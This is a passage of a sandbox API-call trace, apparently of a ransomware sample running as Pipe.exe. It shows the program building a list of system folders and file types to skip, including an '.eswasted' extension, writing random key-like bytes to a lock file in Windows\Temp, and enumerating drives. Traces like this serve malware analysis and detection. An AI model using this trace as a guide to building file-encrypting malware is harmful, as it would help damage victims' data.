(lpString="sbin") returned 4 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4112*=0x73, cb=0x8, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.075] StrChrW (lpStart="sys|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.076] lstrlenW (lpString="sys") returned 3 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c411c*=0x73, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] StrChrW (lpStart="vmlinuz|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.076] lstrlenW (lpString="vmlinuz") returned 7 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4124*=0x76, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] StrChrW (lpStart="run|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.076] lstrlenW (lpString="run") returned 3 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4134*=0x72, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] StrChrW (lpStart="var|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.076] lstrlenW (lpString="var") returned 3 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c413c*=0x76, cb=0x6, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.076] StrChrW (lpStart="\\Boot|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.076] lstrlenW (lpString="\\Boot") returned 5 [0069.076] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4144*=0x5c, cb=0xa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] StrChrW (lpStart="System Volume Information|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.077] lstrlenW (lpString="System Volume Information") returned 25 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4150*=0x53, cb=0x32, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] StrChrW (lpStart="$RECYCLE.BIN|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.077] lstrlenW (lpString="$RECYCLE.BIN") returned 12 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c4184*=0x24, cb=0x18, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] StrChrW (lpStart="WebCache|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.077] lstrlenW (lpString="WebCache") returned 8 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c419e*=0x57, cb=0x10, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] StrChrW (lpStart="Caches|WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|WindowsApps|AppData|ProgramData|\\Users\\All Users" [0069.077] lstrlenW (lpString="Caches") returned 6 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c41b0*=0x43, cb=0xc, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.077] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] StrChrW (lpStart="WindowsApps|AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|AppData|ProgramData|\\Users\\All Users" [0069.078] lstrlenW (lpString="WindowsApps") returned 11 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c41be*=0x57, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] StrChrW (lpStart="AppData|ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|ProgramData|\\Users\\All Users" [0069.078] lstrlenW (lpString="AppData") returned 7 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c41d6*=0x41, cb=0xe, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] StrChrW (lpStart="ProgramData|\\Users\\All Users", wMatch=0x7c) returned="|\\Users\\All Users" [0069.078] lstrlenW (lpString="ProgramData") returned 11 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c41e6*=0x50, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] StrChrW (lpStart="\\Users\\All Users", wMatch=0x7c) returned 0x0 [0069.078] lstrlenW (lpString="\\Users\\All Users") returned 16 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x4c41fe*=0x5c, cb=0x20, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] ISequentialStream:RemoteWrite (in: This=0x4bdf78, pv=0x111fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0069.078] IStream:Stat (in: This=0x4bdf78, pstatstg=0x111fe38, grfStatFlag=0x1 | out: pstatstg=0x111fe38) returned 0x0 [0069.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x604) returned 0x4c4738 [0069.079] IStream:RemoteSeek (in: This=0x4bdf78, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0069.079] ISequentialStream:RemoteRead (in: This=0x4bdf78, pv=0x4c4738, cb=0x602, pcbRead=0x0 | out: pv=0x4c4738*=0x2a, pcbRead=0x0) returned 0x0 [0069.079] IUnknown:Release (This=0x4bdf78) returned 0x0 [0069.079] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c40d0 | out: hHeap=0x4a0000) returned 1 [0069.079] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4478 | out: hHeap=0x4a0000) returned 1 [0069.079] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c4010 | out: hHeap=0x4a0000) returned 1 [0069.079] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c3eb0 | out: hHeap=0x4a0000) returned 1 [0069.079] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bc5a8 | out: hHeap=0x4a0000) returned 1 [0069.079] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0069.079] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x111ff74 | out: pNumArgs=0x111ff74) returned 0x4c3eb0*="C:\\Windows\\SysWOW64\\Pipe.exe" [0069.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x21) returned 0x4bc5a8 [0069.079] CryptAcquireContextW (in: phProv=0x111fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fea8*=0x4c45e8) returned 1 [0069.316] CryptGenRandom (in: hProv=0x4c45e8, dwLen=0x21, pbBuffer=0x4bc5a8 | out: pbBuffer=0x4bc5a8) returned 1 [0069.316] CryptReleaseContext (hProv=0x4c45e8, dwFlags=0x0) returned 1 [0069.316] CreateFileW (lpFileName="C:\\Windows\\TEMP\\lck.log" (normalized: "c:\\windows\\temp\\lck.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0069.316] WriteFile (in: hFile=0xe8, lpBuffer=0x4bc5a8*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x111fec4, lpOverlapped=0x0 | out: lpBuffer=0x4bc5a8*, lpNumberOfBytesWritten=0x111fec4*=0x21, lpOverlapped=0x0) returned 1 [0069.317] SetEndOfFile (hFile=0xe8) returned 1 [0069.318] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.318] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4bc5a8 | out: hHeap=0x4a0000) returned 1 [0069.318] _wcslwr (in: _String=0x4bcba0 | out: _String="*") returned="*" [0069.318] _wcslwr (in: _String=0x4c4738 | out: _String="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" [0069.318] GetLogicalDriveStringsW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x5 [0069.318] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x24) returned 0x4bc5a8 [0069.318] GetLogicalDriveStringsW (in: nBufferLength=0x5, lpBuffer=0x4bc5be | out: lpBuffer="C:\\") returned 0x4 [0069.318] lstrlenW (lpString="C:\\") returned 3 [0069.318] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.319] lstrlenW (lpString="C:\\") returned 3 [0069.319] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.319] QueryDosDeviceW (in: lpDeviceName="C:", lpTargetPath=0x111fe8c, ucchMax=0x18 | out: lpTargetPath="\\Device\\HarddiskVolume1") returned 0x0 [0069.319] lstrlenW (lpString="C:\\") returned 3 [0069.319] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.319] lstrlenW (lpString="C:\\") returned 3 [0069.319] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.319] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x44) returned 0x4c3f40 [0069.319] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xec [0069.319] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1005baf, lpParameter=0x4c3f40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf4 [0069.320] StrChrW (lpStart="C:\\", wMatch=0x7c) returned 0x0 [0069.320] lstrlenW (lpString="C:\\") returned 3 [0069.320] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xfffe) returned 0x4c5220 [0069.321] lstrlenW (lpString="*") returned 1 [0069.321] lstrlenW (lpString="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") returned 769 [0069.321] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x608) returned 0x4d5228 [0069.321] lstrcpyW (in: lpString1=0x4d522c, lpString2="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*" | out: lpString1="*.eswasted_info|*.eswasted|*\\ntldr|*\\bootmgr|*\\grldr|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.bak|*.dat|*.sdi|*.wim|*.dll|*.exe|c:\\programdata\\*|c:\\windows\\*|c:\\windows\\temp\\*|c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\*|c:\\recovery\\*|c:\\program files\\*|c:\\program files (x86)\\*|*\\bin\\*|*\\boot\\*|*\\boot\\*|*\\dev\\*|*\\etc\\*|*\\lib\\*|*\\initdr\\*|*\\sbin\\*|*\\sys\\*|*\\vmlinuz\\*|*\\run\\*|*\\var\\*|*\\boot\\*|*\\system volume information\\*|*\\$recycle.bin\\*|*\\webcache\\*|*\\caches\\*|*\\windowsapps\\*|*\\appdata\\*|*\\programdata\\*|*\\users\\all users\\*") 